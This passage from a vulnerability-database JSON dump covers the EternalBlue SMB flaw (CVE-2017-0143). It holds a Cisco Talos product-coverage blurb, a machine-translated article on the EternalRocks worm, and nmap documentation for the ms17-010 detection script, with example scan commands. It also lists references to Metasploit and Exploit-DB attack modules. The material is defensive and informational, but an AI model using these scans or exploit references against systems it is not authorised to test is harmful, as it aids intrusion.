both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/--TetNIenFDw/WRY2T6Gh_tI/AAAAAAAABAI/VUP5yvEUxlYyxfm_v3LguEXy7uMaodf2wCPcB/s1600/all-no-cloudlock-esa.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" height=\"268\" src=\"https://1.bp.blogspot.com/--TetNIenFDw/WRY2T6Gh_tI/AAAAAAAABAI/VUP5yvEUxlYyxfm_v3LguEXy7uMaodf2wCPcB/s320/all-no-cloudlock-esa.png\" width=\"320\" /></a></div><br />Advanced Malware Protection (<a href=\"https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html\">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html\">CWS</a> or<a href=\"https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html\"> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Network Security appliances such as<a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\">NGFW</a>,<a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and<a href=\"https://meraki.cisco.com/products/appliances\"> </a><a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=\"https://umbrella.cisco.com/\">Umbrella</a> prevents DNS resolution of the domains associated with malicious activity.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html\">Stealthwatch</a> detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=pEAlAYO6L5w:NmJ_uKh_Slw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/pEAlAYO6L5w\" height=\"1\" width=\"1\" alt=\"\"/>", "title": "Cisco Coverage for Adylkuzz, Uiwix, and EternalRocks", "cvelist": ["CVE-2017-0143"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 49, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-06-30T15:02:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2017-06-30T15:02:29", "rev": 2}}, "reporter": "noreply@blogger.com (Alexander Chiu)", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "talosblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "myhack58": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.myhack58.com/Article/html/3/62/2017/86371.htm", "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "5908ccc762a8ce8ab3b7aaa16c3d7b9f"}, {"key": "href", "hash": "7d4991f73aecf7d2b5314e03aed1d872"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "published", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "59ade3b2711db2c23e61d8656b755323"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2017-05-25T17:49:47", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2017-05-25T17:49:47", "rev": 2}}, "id": "MYHACK58:62201786371", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "## Preface\n\nSince the Shadow Brokers published NSA Elite hacking team Equation Group the use of 0-day vulnerabilities and hacker tools, hacker groups and independent hackers started to exploit these vulnerabilities and tools to initiate various attacks. But industry insiders believe that the 4 month Shadow Brokers published include high-risk Windows SMB vulnerabilities, including a series of Windows hacking tool data, is by far the most destructive of the data.\n\nWannaCry after the outbreak, security researchers have found many hackers exploit Windows SMB Vulnerability, CVE-2017-0143\uff09\uff08i.e. Enternal Blue for a variety of hacking activities, in addition, Eternalblue SMB vulnerability MS17-010 has been transferred to the Metasploit penetration testing framework, which allows researchers and hackers can easily take advantage of this vulnerability expand to different actions.\n\nTherefore, in addition to WannaCry this massive global attack, a large number of hacker groups, state-sponsored hackers, in order to earn money for the purpose of network criminal and grey hat hacker use Eternalblue initiated a variety of large or smaller attack, in fact, is not surprising.\n\nThe following is a security researchers recently discovered the use of the SMB vulnerability to initiate the attack, some occur in WannaCry before, and some occur in WannaCry.\n\n## One, EternalRocks worms\n\n5 on 17 May, the researchers found a product called EternalRocks New use of SMB vulnerability of the worms. With the use of two NSA vulnerability and tools WannaCry compared EternalRocks worms can be had and less. The worm Co-use of a four-section SMB vulnerability and three NSA hack tool include the following:\n\nEternalBlue \u2014 SMBv1 vulnerability\n\nEternalRomance \u2014 SMBv1 vulnerability\n\nEternalChampion \u2014 SMBv2 vulnerability\n\nEternalSynergy \u2014 SMBv3 vulnerability\n\nSMBTouch \u2014 SMB investigative tool\n\nArchTouch \u2014 SMB reconnaissance tool\n\n**[1] [[2]](<86371_2.htm>) [[3]](<86371_3.htm>) [[4]](<86371_4.htm>) [[5]](<86371_5.htm>) [[6]](<86371_6.htm>) [next](<86371_2.htm>)**\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-05-25T17:49:47", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-05-25T17:49:47", "rev": 2, "value": 6.3, "vector": "NONE"}}, "hash": "f74b87ed4e300d361b44cca49e75216c6844fdc8cb3f7ec21ecb2182864a4d8f", "hashmap": [{"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "5908ccc762a8ce8ab3b7aaa16c3d7b9f", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "59ade3b2711db2c23e61d8656b755323", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}, {"hash": "7d4991f73aecf7d2b5314e03aed1d872", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}], "history": [], "href": "http://www.myhack58.com/Article/html/3/62/2017/86371.htm", "id": "MYHACK58:62201786371", "immutableFields": [], "lastseen": "2017-05-25T17:49:47", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-23T00:00:00", "references": [], "reporter": "\u4f5a\u540d", "title": "The SMB vulnerability triggered\u201cbloodshed\u201d, far more than WannaCry-vulnerability warning-the black bar safety net", "type": "myhack58", "viewCount": 121}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-05-25T17:49:47"}], "references": [], "lastseen": "2017-05-25T17:49:47", "published": "2017-05-23T00:00:00", "description": "## Preface\n\nSince the Shadow Brokers published NSA Elite hacking team Equation Group the use of 0-day vulnerabilities and hacker tools, hacker groups and independent hackers started to exploit these vulnerabilities and tools to initiate various attacks. But industry insiders believe that the 4 month Shadow Brokers published include high-risk Windows SMB vulnerabilities, including a series of Windows hacking tool data, is by far the most destructive of the data.\n\nWannaCry after the outbreak, security researchers have found many hackers exploit Windows SMB Vulnerability, CVE-2017-0143\uff09\uff08i.e. Enternal Blue for a variety of hacking activities, in addition, Eternalblue SMB vulnerability MS17-010 has been transferred to the Metasploit penetration testing framework, which allows researchers and hackers can easily take advantage of this vulnerability expand to different actions.\n\nTherefore, in addition to WannaCry this massive global attack, a large number of hacker groups, state-sponsored hackers, in order to earn money for the purpose of network criminal and grey hat hacker use Eternalblue initiated a variety of large or smaller attack, in fact, is not surprising.\n\nThe following is a security researchers recently discovered the use of the SMB vulnerability to initiate the attack, some occur in WannaCry before, and some occur in WannaCry.\n\n## One, EternalRocks worms\n\n5 on 17 May, the researchers found a product called EternalRocks New use of SMB vulnerability of the worms. With the use of two NSA vulnerability and tools WannaCry compared EternalRocks worms can be had and less. The worm Co-use of a four-section SMB vulnerability and three NSA hack tool include the following:\n\nEternalBlue \u2014 SMBv1 vulnerability\n\nEternalRomance \u2014 SMBv1 vulnerability\n\nEternalChampion \u2014 SMBv2 vulnerability\n\nEternalSynergy \u2014 SMBv3 vulnerability\n\nSMBTouch \u2014 SMB investigative tool\n\nArchTouch \u2014 SMB reconnaissance tool\n\n**[1] [[2]](<86371_2.htm>) [[3]](<86371_3.htm>) [[4]](<86371_4.htm>) [[5]](<86371_5.htm>) [[6]](<86371_6.htm>) [next](<86371_2.htm>)**\n", "title": "The SMB vulnerability triggered\u201cbloodshed\u201d, far more than WannaCry-vulnerability warning-the black bar safety net", "cvelist": ["CVE-2017-0143"], "objectVersion": "1.5", "type": "myhack58", "viewCount": 121, "reporter": "\u4f5a\u540d", "bulletinFamily": "info", "hash": "00c1186f6d04e02cd9a376721c157b3eb6a4e0364079bc101ecba5216ed03b81", "modified": "2017-05-23T00:00:00", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "scheme": null}], "nmap": [{"id": "NMAP:SMB-VULN-MS17-010.NSE", "bulletinFamily": "scanner", "title": "smb-vuln-ms17-010 NSE Script", "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "published": "2017-05-27T07:57:34", "modified": "2018-06-28T13:40:30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "reporter": "Paulino Calderon <paulino()calderonpale.com>", "references": [], "cvelist": ["CVE-2017-0143"], "type": "nmap", "lastseen": "2021-08-23T12:08:20", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d62498d18b954b52be35dc2e4e9cdca7f74815777ed89faa80ee3d07b8787cb6", "hashmap": [{"hash": "2c4f3a4202dff921e10ce885637fccc8", "key": "sourceData"}, {"hash": "2f72f162101e843e99c7a567ce92e387", "key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": 